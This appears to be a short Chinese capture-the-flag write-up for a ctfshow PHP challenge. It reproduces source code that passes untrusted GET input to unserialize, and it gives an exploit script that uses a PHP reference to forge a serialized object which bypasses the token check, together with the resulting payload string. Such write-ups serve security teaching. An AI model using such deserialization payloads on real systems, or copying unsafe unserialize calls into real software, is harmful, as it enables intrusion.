目录
源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-04 23:52:24
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
public $token;
public $password;
public function __construct($t,$p){
$this->token=$t;
$this->password = $p;
}
public function login(){
return $this->token===$this->password;
}
}
$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());
if($ctfshow->login()){
echo $flag;
}
思路
只要让password全等于token就好了,而token是一个经过md5加密后的随机数,爆破是很难解出来的,这里可以用php的引用,类似于C语言中的指针,这几天刚好在buu做过类似的
题解
exp
<?php
class ctfshowAdmin{
public $token;
public $password;
// public function __construct($t,$p){
// $this->token=$t;
// $this->password = $p;
// }
// public function login(){
// return $this->token===$this->password;
// }
}
$a = new ctfshowAdmin;
$a -> password = & $a -> token;
echo urlencode(serialize($a));
//O:12:"ctfshowAdmin":2:{s:5:"token";N;s:8:"password";R:2;}
总结
水题
